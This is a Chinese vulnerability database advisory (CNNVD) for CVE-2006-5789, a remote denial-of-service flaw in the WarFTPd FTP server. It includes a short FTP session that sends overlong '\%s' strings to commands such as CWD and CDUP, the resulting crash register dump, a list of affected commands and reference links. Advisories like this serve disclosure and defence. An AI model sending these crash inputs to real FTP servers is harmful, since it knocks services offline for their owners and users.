漏洞信息详情

WarFTPd多个命令处理远程拒绝服务漏洞

• CNNVD编号：CNNVD-200611-119
• 危害等级： 中危
  
• CVE编号： CVE-2006-5789
• 漏洞类型： 资源管理错误
• 发布时间： 2006-11-07
• 威胁类型： 远程
• 更新时间： 2006-11-16
• 厂        商： jgaa
• 漏洞来源： Joxean Koret joxea...

漏洞简介

War FTP Daemon（warftpd）是一款用于Windows平台中的免费FTP服务器，它支持多重连接、用户权限设置和磁盘配额限制等。

WarFTPd在处理多个命令的畸形参数时存在漏洞，远程攻击者可能利用此漏洞对服务器造成拒绝服务。

如果向各种命令发送了包含有两次\"\\%s\"字符的超长字符串的话，就会导致WarFTPd拒绝服务。例如，发送以下命令：

$ ftp target

(Banner)

ftp＞ quote user anonymous

ftp＞ quote pass bla

ftp＞ cwd \\%s*256

或者：

ftp＞ cdup \\%s*256

就会导致服务器崩溃：

EAX 00000001

ECX 00000073

EDX 00000002

EBX 0079E890

ESP 0079E7A0

EBP 00A55A8A ASCII

\"s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s\\%s(...more \\%s

characters)\"

ESI 0079E7DE

EDI 0000000A

EIP 00431540 war-ftpd.00431540

00431540 8A08 MOV CL,BYTE PTR DS：[EAX]

目前已知至少以下命令受这个漏洞影响：

CWD

CDUP

DELE

NLST

LIST

SIZE

漏洞公告

目前厂商还没有提供补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://support.jgaa.com/index.php?MenuPage=frontpage

参考网址

来源: BID

名称: 20944

链接:http://www.securityfocus.com/bid/20944

来源: BUGTRAQ

名称: 20061107 WarFTPd 1.82.00-RC11 Remote Denial Of Service

链接:http://www.securityfocus.com/archive/1/archive/1/450804/100/0/threaded

来源: VUPEN

名称: ADV-2006-4398

链接:http://www.frsirt.com/english/advisories/2006/4398

来源: SECTRACK

名称: 1017174

链接:http://securitytracker.com/id?1017174

来源: SECUNIA

名称: 22755

链接:http://secunia.com/advisories/22755

来源: XF

名称: warftpd-string-dos(30077)

链接:http://xforce.iss.net/xforce/xfdb/30077

来源: SREASON

名称: 1832

链接:http://securityreason.com/securityalert/1832

受影响实体

• Jgaa Warftpd:1.82.00_rc11  

补丁

暂无